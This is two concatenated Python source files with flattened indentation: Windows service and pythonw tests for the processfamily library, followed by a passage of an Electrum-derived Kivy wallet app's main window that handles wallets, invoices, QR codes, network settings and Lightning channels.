from processfamily.test.ExeBuilder import build_service_exe
from processfamily.processes import USE_PROCESS_QUERY_LIMITED_INFORMATION
class PythonWTests(_BaseProcessFamilyFunkyWebServerTestSuite):
skip_crash_test = "The crash test throws up a dialog in this context" if sys.platform.startswith('win') else None
def start_parent_process(self):
self.parent_process = subprocess.Popen(
[Config.pythonw_exe, self.get_path_to_ParentProcessPy()],
close_fds=True,
creationflags=CREATE_BREAKAWAY_FROM_JOB)
threading.Thread(target=self.parent_process.communicate).start()
def wait_for_parent_to_stop(self, timeout):
self.wait_for_process_to_stop(getattr(self, 'parent_process', None), timeout)
class WindowsServiceTests(_BaseProcessFamilyFunkyWebServerTestSuite):
@classmethod
def setUpClass(cls, service_username=None):
cls.send_stop_and_then_wait_for_service_to_stop_ignore_errors()
cls.service_exe = build_service_exe()
subprocess.check_call([cls.service_exe] + (["--username", service_username] if service_username else []) + ["install"])
@classmethod
def tearDownClass(cls):
if hasattr(cls, 'service_exe'):
subprocess.check_call([cls.service_exe, "remove"])
def try_and_stop_everything_for_tear_down(self):
self.send_stop_and_then_wait_for_service_to_stop_ignore_errors()
def start_parent_process(self):
win32serviceutil.StartService(Config.svc_name)
def wait_for_parent_to_stop(self, timeout):
self.wait_for_service_to_stop(timeout)
@classmethod
def wait_for_service_to_stop(cls, timeout):
start_time = time.time()
while time.time()-start_time < timeout:
    if win32serviceutil.QueryServiceStatus(Config.svc_name)[1] == win32service.SERVICE_STOPPED:
        return
    time.sleep(0.3)
def test_parent_interrupt_main(self):
self.skipTest("Interrupt main doesn't do anything useful in a windows service")
def test_parent_interrupt_main_child_locked_up(self):
self.skipTest("Interrupt main doesn't do anything useful in a windows service")
def test_service_stop(self):
self.start_up()
win32serviceutil.StopService(Config.svc_name)
def test_service_stop_child_locked_up(self):
self.start_up()
self.freeze_up_middle_child()
win32serviceutil.StopService(Config.svc_name)
#This needs time to wait for the child for 10 seconds:
self.wait_for_parent_to_stop(11)
def test_service_stop_child_freeze_on_start(self):
self.start_up(test_command='child_freeze_on_start', wait_for_middle_child=False)
self.assert_middle_child_port_unbound()
win32serviceutil.StopService(Config.svc_name)
#This still needs time to wait for the child to stop for 10 seconds:
self.wait_for_parent_to_stop(11)
@classmethod
def send_stop_and_then_wait_for_service_to_stop_ignore_errors(cls):
try:
win32serviceutil.StopService(Config.svc_name)
cls.wait_for_service_to_stop(20)
except Exception as e:
pass
if not USE_PROCESS_QUERY_LIMITED_INFORMATION:
def test_parent_kill(self):
self.skipTest("I cannot kill a network service service from here - I get an access denied error")
def test_parent_kill_child_locked_up(self):
self.skipTest("I cannot kill a network service service from here - I get an access denied error")
class WindowsServiceNetworkServiceUserTests(WindowsServiceTests):
@staticmethod
def grant_network_service_rights(folder, rights):
try:
subprocess.check_call(["cmd.exe", "/C", "icacls", folder, "/grant", "NETWORK SERVICE:(OI)(CI)%s" % rights])
except Exception as e:
logging.warning("icacls command returned a non-zero response for folder/file '%s'")
@classmethod
def setUpClass(cls):
#I do this just in case we left the service running by interrupting the tests
cls.send_stop_and_then_wait_for_service_to_stop_ignore_errors()
tmp_dir = os.path.join(os.path.dirname(__file__), 'test', 'tmp')
if not os.path.exists(tmp_dir):
os.makedirs(tmp_dir)
#Make sure network service has full access to the tmp folder (and these are inheritable)
cls.grant_network_service_rights(tmp_dir, "F")
#And read / execute access to Python, and other folders on the python path:
cls.grant_network_service_rights(os.path.abspath(sys.prefix), "RX")
done_paths = [os.path.abspath(sys.prefix)]
for path_item in sorted(sys.path, key=lambda p: len(os.path.abspath(p))):
abspath_item = os.path.abspath(path_item)
already_done = False
for p in done_paths:
if abspath_item.startswith(p):
already_done = True
break
if not already_done:
cls.grant_network_service_rights(abspath_item, "RX")
done_paths.append(abspath_item)
super(WindowsServiceNetworkServiceUserTests, cls).setUpClass(service_username="NT AUTHORITY\\NetworkService")
def test_parent_kill(self):
self.skipTest("I cannot kill a network service service from here - I get an access denied error")
def test_parent_kill_child_locked_up(self):
self.skipTest("I cannot kill a network service service from here - I get an access denied error")
#Remove the base class from the module dict so it isn't smelled out by nose:
del(_BaseProcessFamilyFunkyWebServerTestSuite)
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.wallet_db import WalletDB
from electrum.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum.plugin import run_hook
from electrum import util
from electrum.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis,
maybe_extract_bolt11_invoice)
from electrum.invoices import PR_PAID, PR_FAILED
from electrum import blockchain
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.interface import PREFERRED_NETWORK_PROTOCOL, ServerAddr
from electrum.logging import Logger
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import OpenWalletDialog, ChangePasswordDialog, PincodeDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
# register the widget cache to keep memory usage down; the timeout is set so
# that the data stays cached forever
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (NoDynamicFeeEstimates, NotEnoughFunds)
from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog
from .uix.dialogs.lightning_channels import LightningChannelsDialog
if TYPE_CHECKING:
from . import ElectrumGui
from electrum.simple_config import SimpleConfig
from electrum.plugin import Plugins
from electrum.paymentrequest import PaymentRequest
class ElectrumWindow(App, Logger):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
lightning_gossip_num_peers = NumericProperty(0)
lightning_gossip_num_nodes = NumericProperty(0)
lightning_gossip_num_channels = NumericProperty(0)
lightning_gossip_num_queries = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = PREFERRED_NETWORK_PROTOCOL
def cb2(server_str):
popup.ids.server_str.text = server_str
servers = self.network.get_servers()
server_choices = {}
for _host, d in sorted(servers.items()):
port = d.get(protocol)
if port:
server = ServerAddr(_host, port, protocol=protocol)
server_choices[server.net_addr_str()] = _host
ChoiceDialog(_('Choose a server'), server_choices, popup.ids.server_str.text, cb2).open()
def maybe_switch_to_server(self, server_str: str):
net_params = self.network.get_parameters()
try:
server = ServerAddr.from_str_with_inference(server_str)
if not server: raise Exception("failed to parse")
except Exception as e:
self.show_error(_("Invalid server details: {}").format(repr(e)))
return
net_params = net_params._replace(server=server)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
android_backups = BooleanProperty(False)
def on_android_backups(self, instance, x):
self.electrum_config.set_key('android_backups', self.android_backups, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def set_ln_invoice(self, invoice):
self.switch_to('send')
self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = str(intent.getDataString())
if str(intent.getScheme()).lower() in ('ilcoin', 'lightning'):
self._process_invoice_str(data)
_invoice_intent_queued = None # type: Optional[str]
def _process_invoice_str(self, invoice: str) -> None:
if not self.wallet:
self._invoice_intent_queued = invoice
return
if not self.send_screen:
self.switch_to('send')
self._invoice_intent_queued = invoice
return
if invoice.lower().startswith('ilcoin:'):
self.set_URI(invoice)
elif invoice.lower().startswith('lightning:'):
self.set_ln_invoice(invoice)
def _maybe_process_queued_invoice(self, *dt):
if not self.wallet:
return
invoice_queued = self._invoice_intent_queued
if invoice_queued:
self._invoice_intent_queued = None
self._process_invoice_str(invoice_queued)
def on_language(self, instance, language):
self.logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
self.logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
self.logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, wallet, key, status):
if key not in self.wallet.receive_requests:
return
self.update_tab('receive')
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, wallet, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = self.wallet.get_invoice_status(req)
# todo: update single item
self.update_tab('send')
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
def on_payment_succeeded(self, event, wallet, key):
description = self.wallet.get_label(key)
self.show_info(_('Payment succeeded') + '\n\n' + description)
self._trigger_update_history()
def on_payment_failed(self, event, wallet, key, reason):
self.show_info(_('Payment failed') + '\n\n' + reason)
def _get_bu(self):
return self.electrum_config.get_base_unit()
def _set_bu(self, value):
self.electrum_config.set_base_unit(value)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return self.electrum_config.get_decimal_point()
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, decimal_point=self.decimal_point())
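# Worked example (illustrative rate, not a real quote): at an exchange rate of
# 20000 fiat units per BTC, fiat_to_btc('100') yields int(1e8 * 100 / 20000)
# = 500000 satoshis, i.e. 0.005 BTC; btc_to_fiat() performs the inverse conversion.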
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Screen orientation the app is currently using.
Can be one of `landscape` or `portrait`.
:data:`orientation` is a read-only `AliasProperty`. Defaults to 'landscape'.
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Tries to ascertain the kind of device the app is running on.
Can be one of `tablet` or `phone`.
:data:`ui_mode` is a read-only `AliasProperty`. Defaults to 'phone'.
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
App.__init__(self)#, **kwargs)
Logger.__init__(self)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.server.host
self.server_port = str(net_params.server.port)
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so that updates happen at most twice a second
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
self._periodic_process_queued_invoice = Clock.schedule_interval(self._maybe_process_queued_invoice, .5)
# cached dialogs
self._settings_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
self.invoice_popup = None
self.request_popup = None
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('ilcoin:'):
self.set_URI(data)
return
if data.startswith('channel_backup:'):
self.import_channel_backup(data)
return
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
return
# try to decode transaction
from electrum.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
self.request_popup = RequestDialog('Request', key)
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = invoice.invoice if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None, help_text=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(
title, data, show_text,
failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard,
help_text=help_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
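# handle_crash_on_startup below is a decorator: it wraps a method so that any
# exception raised during startup is logged and handed to the CrashReporter
# dialog, which stops the app once it is dismissed.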
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
self.logger.exception('crash on startup')
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the Kivy UI.
'''
import time
self.logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
Window.bind(on_key_down=self.on_key_down)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
util.register_callback(self.on_network_event, interests)
util.register_callback(self.on_fee, ['fee'])
util.register_callback(self.on_fee_histogram, ['fee_histogram'])
util.register_callback(self.on_quotes, ['on_quotes'])
util.register_callback(self.on_history, ['on_history'])
util.register_callback(self.on_channels, ['channels_updated'])
util.register_callback(self.on_channel, ['channel'])
util.register_callback(self.on_invoice_status, ['invoice_status'])
util.register_callback(self.on_request_status, ['request_status'])
util.register_callback(self.on_payment_failed, ['payment_failed'])
util.register_callback(self.on_payment_succeeded, ['payment_succeeded'])
util.register_callback(self.on_channel_db, ['channel_db'])
util.register_callback(self.set_num_peers, ['gossip_peers'])
util.register_callback(self.set_unknown_channels, ['unknown_channels'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def on_channel_db(self, event, num_nodes, num_channels, num_policies):
self.lightning_gossip_num_nodes = num_nodes
self.lightning_gossip_num_channels = num_channels
def set_num_peers(self, event, num_peers):
self.lightning_gossip_num_peers = num_peers
def set_unknown_channels(self, event, unknown):
self.lightning_gossip_num_queries = unknown
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, storage, db):
if storage:
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True),
ask_if_wizard=True)
def _on_decrypted_storage(self, storage: WalletStorage):
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
if db.requires_upgrade():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.upgrade_storage(storage, db)
else:
self.on_wizard_complete(None, storage, db)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
else:
def launch_wizard():
d = OpenWalletDialog(self, path, self.on_open_wallet)
d.open()
if not ask_if_wizard:
launch_wizard()
else:
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_open_wallet(self, pw, storage):
if not storage.file_exists():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.run('new')
else:
try:
storage.decrypt(pw)
except StorageReadWriteError:
self.show_error(_("R/W error accessing path"))
return
self.password = pw
self._on_decrypted_storage(storage)
def on_stop(self):
self.logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def lightning_open_channel_dialog(self):
if not self.wallet.has_lightning():
self.show_error(_('Lightning is not enabled for this wallet'))
return
if not self.wallet.lnworker.channels:
warning1 = _("Lightning support in Electrum is experimental. "
"Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable "
"from your seed. You must backup your wallet file everytime "
"you create a new channel.")
d = Question(_('Do you want to create your first channel?') +
'\n\n' + warning1 + '\n\n' + warning2, self.open_channel_dialog_with_warning)
d.open()
else:
d = LightningOpenChannelDialog(self)
d.open()
def open_channel_dialog_with_warning(self, b):
if b:
d = LightningOpenChannelDialog(self)
d.open()
def lightning_channels_dialog(self):
if self._channels_dialog is None:
self._channels_dialog = LightningChannelsDialog(self)
self._channels_dialog.open()
def on_channel(self, evt, wallet, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def wallets_dialog(self):
from .uix.dialogs.wallets import WalletDialog
dirname = os.path.dirname(self.electrum_config.get_wallet_path())
d = WalletDialog(dirname, self.load_wallet_by_name)
d.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
self.wallets_dialog()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize the UX part of Electrum. This function performs the basic
tasks of setting up the UI.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "electrum/gui/icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.server.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
self.logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
self.request_focus_for_main_view()
def request_focus_for_main_view(self):
if platform != 'android':
return
# The main view of the activity might not have focus,
# in which case e.g. the OS "back" button would not work.
# see #6276 (specifically "method 2" and "method 3")
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
PythonActivity.requestFocusForMainView()
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
